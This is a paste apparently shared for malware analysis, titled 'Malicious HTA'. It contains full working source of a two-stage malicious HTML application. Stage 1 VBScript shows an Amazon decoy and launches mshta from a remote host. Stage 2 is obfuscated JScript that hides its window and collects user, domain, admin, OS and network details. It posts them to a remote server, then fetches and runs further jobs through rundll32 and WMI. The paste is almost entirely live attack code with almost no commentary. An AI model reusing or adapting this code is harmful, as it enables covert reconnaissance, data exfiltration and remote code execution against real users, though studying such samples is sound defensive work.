Advertisement
dissectmalware

Malicious HTA

Jun 28th, 2019
1,855
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. igggggnooooooor this line
  2.  
  3. ///////// Stage 1 ///////////////////
  4. <script language="VBScript">
  5. Dim iURL
  6. iURL = "https://www.amazon.com/gp/drive"
  7.  
  8. Set objShell = CreateObject("Wscript.Shell")
  9. strInfo = objShell.expandenvironmentstrings("%COMPUTERNAME%")
  10. strInfo2 = objShell.expandenvironmentstrings("%LOGONSERVER%")
  11. strInfo2 = replace(strInfo2, "\\", "")
  12. if strInfo2 = strInfo then
  13.         msgbox ("error opening document")
  14. else
  15.         objShell.run(iURL)
  16.         objShell.Run "mshta https://docshare.safedatasystems.com:443/235gfd"
  17.         Window.Close
  18.         end if
  19. </script>
  20.  
  21.  
  22.  
  23. ///////// Stage 2 //////////////////
  24.  
  25. <html>
  26. <head>
  27. <script language="JScript">
  28. window.moveTo(-1337, -2019);
  29. window.blur();
  30. window.resizeTo(2, 4);
  31.  
  32. try
  33. {
  34.     window.onerror = function(sMsg, sUrl, sLine) { return false; }
  35.     window.onfocus = function() { window.blur(); }
  36. }
  37. catch (e){}
  38.  
  39. var QASIHKVVLB={};QASIHKVVLB.WUGSEFYMRD=new ActiveXObject("Scripting.FileSystemObject");QASIHKVVLB.UTINHUTENQ=new ActiveXObject("WScript.Shell");QASIHKVVLB.ZXNDGZZVJS="https://docshare.safedatasystems.com:443/235gfd";QASIHKVVLB.FVQIPGWMOE="19cc6085c4b24bfca38cac4b59dddd21";QASIHKVVLB.LLCZPIKBVW="";QASIHKVVLB.BBFFFMPAGP="https://docshare.safedatasystems.com:443/235gfd?V0GGVJNH4X=19cc6085c4b24bfca38cac4b59dddd21;GU1SYCFEL4=";QASIHKVVLB.UHZHKLSJIG="999999999999999";QASIHKVVLB.FPQBBTIMXD=function()
  40. {if(QASIHKVVLB.MMNCUJOVQX())
  41. {try{window.close();}catch(e){}
  42. try{window.self.close();}catch(e){}
  43. try{window.top.close();}catch(e){}
  44. try{self.close();}catch(e){}
  45. try
  46. {window.open('','_self','');window.close();}
  47. catch(e)
  48. {}}
  49. try
  50. {WScript.quit();}
  51. catch(e)
  52. {}
  53. try
  54. {var pid=QASIHKVVLB.CBOGFVBUDV.currentPID();QASIHKVVLB.CBOGFVBUDV.kill(pid);}
  55. catch(e)
  56. {}}
  57. QASIHKVVLB.MMNCUJOVQX=function()
  58. {return typeof(window)!=="undefined";}
  59. QASIHKVVLB.CGHMTFFONF=function()
  60. {try
  61. {function s4()
  62. {return Math.floor((1+Math.random())*0x10000).toString(16).substring(1);}
  63. return s4()+s4()+'-'+s4()+'-'+s4()+'-'+
  64. s4()+'-'+s4()+s4()+s4();}
  65. catch(e)
  66. {}}
  67. QASIHKVVLB.IADMFMQGLO={};QASIHKVVLB.IADMFMQGLO.XBLYTDPQTZ=function()
  68. {try
  69. {var res=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("(net session || echo unelevated)","%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt");if(res.indexOf("unelevated")==-1)
  70. {return true;}
  71. return false;}
  72. catch(e)
  73. {return false;}}
  74. QASIHKVVLB.IADMFMQGLO.SGPEAFIMUA=function()
  75. {try
  76. {var osver=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");var osbuild=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber");return osver+"***"+osbuild;}
  77. catch(e){}
  78. return"Unknown";}
  79. QASIHKVVLB.IADMFMQGLO.ZOIBSQLOBH=function()
  80. {try
  81. {var DC=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName");if(DC.length>0)
  82. {return DC;}}
  83. catch(e)
  84. {}
  85. return"Unknown";}
  86. QASIHKVVLB.IADMFMQGLO.AKJGCYHLAT=function()
  87. {try
  88. {var arch=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE");return arch;}
  89. catch(e){}
  90. return"Unknown";}
  91. QASIHKVVLB.IADMFMQGLO.KCXQBFNYDY=function()
  92. {try
  93. {var cwd=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("cd","%TEMP%\\cwd.txt");return cwd;}
  94. catch(e)
  95. {}
  96. return"";}
  97. QASIHKVVLB.IADMFMQGLO.SBMJCKVJOL=function()
  98. {try
  99. {var routeprint4=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("route PRINT","%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt");var res=routeprint4.split("\r\n");for(var i=0;i<res.length;i++)
  100. {line=res[i].split(" ");zerocount=0;itemcount=0;correctflag=false;for(var j=0;j<line.length;j++)
  101. {if(line[j])
  102. {itemcount+=1;if(itemcount==4&&correctflag){return line[j];}}
  103. if(line[j]=="0.0.0.0")
  104. {zerocount+=1;if(zerocount==2)
  105. {correctflag=true;}}}}}
  106. catch(e)
  107. {}
  108. return"";}
  109. QASIHKVVLB.IADMFMQGLO.QDLXGHIFXT=function()
  110. {var net=new ActiveXObject("WScript.Network");var domain="";if(net.UserDomain.length!=0)
  111. {domain=net.UserDomain;}
  112. else
  113. {domain=QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD("echo %userdomain%","%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt");domain=domain.split(" \r\n")[0];}
  114. var info=domain+"\\"+net.Username;if(QASIHKVVLB.IADMFMQGLO.XBLYTDPQTZ())
  115. info+="*";info+="~~~"+net.ComputerName;info+="~~~"+QASIHKVVLB.IADMFMQGLO.SGPEAFIMUA();info+="~~~"+QASIHKVVLB.IADMFMQGLO.ZOIBSQLOBH();info+="~~~"+QASIHKVVLB.IADMFMQGLO.AKJGCYHLAT();info+="~~~"+QASIHKVVLB.IADMFMQGLO.KCXQBFNYDY();info+="~~~"+QASIHKVVLB.IADMFMQGLO.SBMJCKVJOL();info+="~~~"+QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ();info+="~~~"+QASIHKVVLB.IADMFMQGLO.PXCSZRYQTS();return info;}
  116. QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ=function()
  117. {try
  118. {var encoder=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Nls\\CodePage\\ACP");return encoder;}
  119. catch(e)
  120. {return"1252";}}
  121. QASIHKVVLB.IADMFMQGLO.PXCSZRYQTS=function()
  122. {try
  123. {var encoder=QASIHKVVLB.UTINHUTENQ.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Nls\\CodePage\\OEMCP");return encoder;}
  124. catch(e)
  125. {return"437";}}
  126. QASIHKVVLB.CIAKFFSIIC={};QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT=function(data,headers)
  127. {return QASIHKVVLB.SDQYWFAOVF.LGMTONFHSH(QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM(),data,headers);}
  128. QASIHKVVLB.CIAKFFSIIC.MREYDTKIKP=function(e)
  129. {try
  130. {var headers={};headers["errno"]=(e.number)?e.number:"-1";headers["errname"]=(e.name)?e.name:"Unknown";headers["errdesc"]=(e.description)?e.description:"Unknown";return QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT(e.message,headers);}
  131. catch(e)
  132. {}}
  133. QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM=function(jobkey)
  134. {var jobkey=(typeof(jobkey)!=="undefined")?jobkey:QASIHKVVLB.LLCZPIKBVW;return QASIHKVVLB.BBFFFMPAGP+jobkey+";";}
  135. QASIHKVVLB.CIAKFFSIIC.OCPMLNCMGJ=function()
  136. {var url=QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM();return QASIHKVVLB.SDQYWFAOVF.LGMTONFHSH(url);}
  137. QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA=function(jobkey,fork32Bit)
  138. {var fork32Bit=(typeof(fork32Bit)!=="undefined")?fork32Bit:false;var cmd="rundll32.exe ***K***\\..\\..\\..\\mshtml,RunHTMLApplication";if(fork32Bit)
  139. cmd=QASIHKVVLB.PEJMFGFUTF.PQYGQIDAVF()+cmd;cmd=cmd.replace("***K***",QASIHKVVLB.CIAKFFSIIC.RMQSOXDELM(jobkey));try{QASIHKVVLB.KENMUZPXQD.KMXUAIQNDC(cmd);}catch(e){QASIHKVVLB.UTINHUTENQ.Run(cmd,0,false);}}
  140. QASIHKVVLB.SDQYWFAOVF={};QASIHKVVLB.SDQYWFAOVF.QWILYWEITP=function()
  141. {var http=null;try
  142. {http=new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");http.setTimeouts(0,0,0,0);}
  143. catch(e)
  144. {http=new ActiveXObject("WinHttp.WinHttpRequest.5.1");http.setTimeouts(30000,30000,30000,0)}
  145. return http;}
  146. QASIHKVVLB.SDQYWFAOVF.ACWUEMNQCB=function(http,headers)
  147. {var headers=(typeof(headers)!=="undefined")?headers:{};var content=false;for(var key in headers)
  148. {var value=headers[key];http.setRequestHeader(key,value);if(key.toUpperCase()=="CONTENT-TYPE")
  149. content=true;}
  150. if(!content)
  151. http.setRequestHeader("Content-Type","application/octet-stream");http.setRequestHeader("encoder",QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ())}
  152. QASIHKVVLB.SDQYWFAOVF.LGMTONFHSH=function(url,data,headers)
  153. {var data=(typeof(data)!=="undefined")?data:"";var http=QASIHKVVLB.SDQYWFAOVF.QWILYWEITP();http.open("POST",url,false);QASIHKVVLB.SDQYWFAOVF.ACWUEMNQCB(http,headers);http.send(data);return http;}
  154. QASIHKVVLB.CBOGFVBUDV={};QASIHKVVLB.KKDYFDJLDD={};QASIHKVVLB.KKDYFDJLDD.IKVTUEVQJX=0x80000000;QASIHKVVLB.KKDYFDJLDD.OKJQQPKLGL=0x80000001;QASIHKVVLB.KKDYFDJLDD.ZYPADGQWJG=0x80000002;QASIHKVVLB.KKDYFDJLDD.DMOKBPYDGJ=0;QASIHKVVLB.KKDYFDJLDD.HXGBIEUDMZ=1;QASIHKVVLB.KKDYFDJLDD.FPJAHMWQGT=2;QASIHKVVLB.KKDYFDJLDD.ZETVECMZFC=3;QASIHKVVLB.KKDYFDJLDD.FXIKUDSPEW=function(computer)
  155. {var computer=(typeof(computer)!=="undefined")?computer:".";var reg=GetObject("winmgmts:\\\\"+computer+"\\root\\default:StdRegProv");return reg;}
  156. QASIHKVVLB.KKDYFDJLDD.LXYBKWSROH=function(hKey,path,key,value,valType,computer)
  157. {var reg=QASIHKVVLB.KKDYFDJLDD.FXIKUDSPEW(computer);reg.CreateKey(hKey,path);if(valType==QASIHKVVLB.KKDYFDJLDD.DMOKBPYDGJ)
  158. reg.SetStringValue(hKey,path,key,value);else if(valType==QASIHKVVLB.KKDYFDJLDD.FPJAHMWQGT)
  159. reg.SetDWORDValue(hKey,path,key,value);else if(valType==QASIHKVVLB.KKDYFDJLDD.ZETVECMZFC)
  160. reg.SetQWORDValue(hKey,path,key,value);else if(valType==QASIHKVVLB.KKDYFDJLDD.HXGBIEUDMZ)
  161. reg.SetBinaryValue(hKey,path,key,value);}
  162. QASIHKVVLB.KENMUZPXQD={};QASIHKVVLB.KENMUZPXQD.KMXUAIQNDC=function(cmd)
  163. {var SW_HIDE=0;var pid=0;var wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2")
  164. var si=wmi.Get("Win32_ProcessStartup").SpawnInstance_();si.ShowWindow=SW_HIDE;si.CreateFlags=16777216;si.X=si.Y=si.XSize=si.ySize=1;var w32proc=wmi.Get("Win32_Process");var method=w32proc.Methods_.Item("Create");var inParams=method.InParameters.SpawnInstance_();inParams.CommandLine=cmd;inParams.CurrentDirectory=null;inParams.ProcessStartupInformation=si;var outParams=w32proc.ExecMethod_("Create",inParams);return outParams.ProcessId;}
  165. QASIHKVVLB.RGTBMPDDFB={};QASIHKVVLB.RGTBMPDDFB.OXMSDFIGQD=function(cmd,stdOutPath)
  166. {cmd="chcp "+QASIHKVVLB.IADMFMQGLO.PXCSZRYQTS()+" & "+cmd;var c="%comspec% /q /c "+cmd+" 1> "+QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(stdOutPath);c+=" 2>&1";QASIHKVVLB.UTINHUTENQ.Run(c,0,true);if(QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ()=="936")
  167. {var data=QASIHKVVLB.PEJMFGFUTF.QABBILDSPJ(stdOutPath);}
  168. else
  169. {var data=QASIHKVVLB.PEJMFGFUTF.NBMHEMZVXN(stdOutPath);}
  170. QASIHKVVLB.PEJMFGFUTF.UTYAUIAKVW(stdOutPath);return data;}
  171. QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC=function(cmd,fork)
  172. {var fork=(typeof(fork)!=="undefined")?fork:true;var c="%comspec% /q /c "+cmd;QASIHKVVLB.UTINHUTENQ.Run(cmd,0,!fork);}
  173. QASIHKVVLB.PEJMFGFUTF={};QASIHKVVLB.PEJMFGFUTF.VYENALGHYK=function(path)
  174. {return QASIHKVVLB.UTINHUTENQ.ExpandEnvironmentStrings(path);}
  175. QASIHKVVLB.PEJMFGFUTF.PQYGQIDAVF=function()
  176. {var base=QASIHKVVLB.PEJMFGFUTF.VYENALGHYK("%WINDIR%");var syswow64=base+"\\SysWOW64\\";if(QASIHKVVLB.WUGSEFYMRD.FolderExists(syswow64))
  177. return syswow64;return base+"\\System32\\";}
  178. QASIHKVVLB.PEJMFGFUTF.QABBILDSPJ=function(path)
  179. {var loopcount=0;while(true)
  180. {if(QASIHKVVLB.WUGSEFYMRD.FileExists(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path))&&QASIHKVVLB.WUGSEFYMRD.GetFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path)).Size>0)
  181. {var fd=QASIHKVVLB.WUGSEFYMRD.OpenTextFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path),1,false,0);var data=fd.ReadAll();fd.Close();return data;}
  182. else
  183. {loopcount+=1;if(loopcount>180)
  184. {return"";}
  185. QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("ping 127.0.0.1 -n 2",false);}}}
  186. QASIHKVVLB.PEJMFGFUTF.NBMHEMZVXN=function(path,exists)
  187. {var exists=(typeof(exists)!=="undefined")?exists:false;if(!QASIHKVVLB.WUGSEFYMRD.FileExists(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path))&&exists)
  188. {var headers={};headers["Status"]="NotExist";QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT("",headers);return"";}
  189. var loopcount=0;while(true)
  190. {if(QASIHKVVLB.WUGSEFYMRD.FileExists(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path))&&QASIHKVVLB.WUGSEFYMRD.GetFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path)).Size>0)
  191. {if(QASIHKVVLB.IADMFMQGLO.TTSQTDOTVQ()=="936")
  192. {var newout="%TEMP%\\"+QASIHKVVLB.CGHMTFFONF()+".txt";QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("whoami");QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("certutil -encode "+QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path)+" "+newout);var data=QASIHKVVLB.PEJMFGFUTF.QABBILDSPJ(newout);QASIHKVVLB.PEJMFGFUTF.UTYAUIAKVW(newout);}
  193. else
  194. {var fp=QASIHKVVLB.WUGSEFYMRD.GetFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path));var fd=fp.OpenAsTextStream();var data=fd.read(fp.Size);fd.close();}
  195. return data;}
  196. else
  197. {loopcount+=1;if(loopcount>180)
  198. {return"";}
  199. QASIHKVVLB.RGTBMPDDFB.DKPNTDZMHC("ping 127.0.0.1 -n 2",false);}}}
  200. QASIHKVVLB.PEJMFGFUTF.UTYAUIAKVW=function(path)
  201. {QASIHKVVLB.WUGSEFYMRD.DeleteFile(QASIHKVVLB.PEJMFGFUTF.VYENALGHYK(path),true);};try
  202. {if(QASIHKVVLB.LLCZPIKBVW!="stage")
  203. {if(QASIHKVVLB.MMNCUJOVQX())
  204. {var path="SOFTWARE\\Microsoft\\Internet Explorer\\Styles";var key="MaxScriptStatements";QASIHKVVLB.KKDYFDJLDD.LXYBKWSROH(QASIHKVVLB.KKDYFDJLDD.OKJQQPKLGL,path,key,0xFFFFFFFF,QASIHKVVLB.KKDYFDJLDD.FPJAHMWQGT);}
  205. QASIHKVVLB.CIAKFFSIIC.XGCXDJIHOT(QASIHKVVLB.IADMFMQGLO.QDLXGHIFXT());try{QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA("");}catch(e){QASIHKVVLB.CIAKFFSIIC.MREYDTKIKP(e)}
  206. QASIHKVVLB.FPQBBTIMXD();}
  207. else
  208. {if(QASIHKVVLB.MMNCUJOVQX())
  209. DoWorkTimeout();else
  210. DoWorkLoop();}}
  211. catch(e)
  212. {QASIHKVVLB.CIAKFFSIIC.MREYDTKIKP(e);}
  213. function DoWork()
  214. {var epoch=new Date().getTime();var expire=parseInt(QASIHKVVLB.UHZHKLSJIG);if(epoch>expire)
  215. {return false;}
  216. try
  217. {var work=QASIHKVVLB.CIAKFFSIIC.OCPMLNCMGJ();if(work.status==201||work.status==202)
  218. {if(work.responseText.length>0){var jobkey=work.responseText;QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA(jobkey,work.status==202);}}
  219. else
  220. {return false;}}
  221. catch(e)
  222. {return false;}
  223. return true;}
  224. function DoWorkLoop()
  225. {while(DoWork());QASIHKVVLB.FPQBBTIMXD();}
  226. function DoWorkTimeout()
  227. {for(var i=0;i<10;++i)
  228. {if(!DoWork())
  229. {QASIHKVVLB.FPQBBTIMXD();return;}}
  230. QASIHKVVLB.CIAKFFSIIC.KQCWRWDBZA("");QASIHKVVLB.FPQBBTIMXD();}
  231. </script>
  232. <hta:application caption="no" windowState="minimize" showInTaskBar="no"
  233.                  scroll="no" navigable="no" />
  234.                  <!--  -->
  235. </head>
  236. <body>
  237. </body>
  238. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement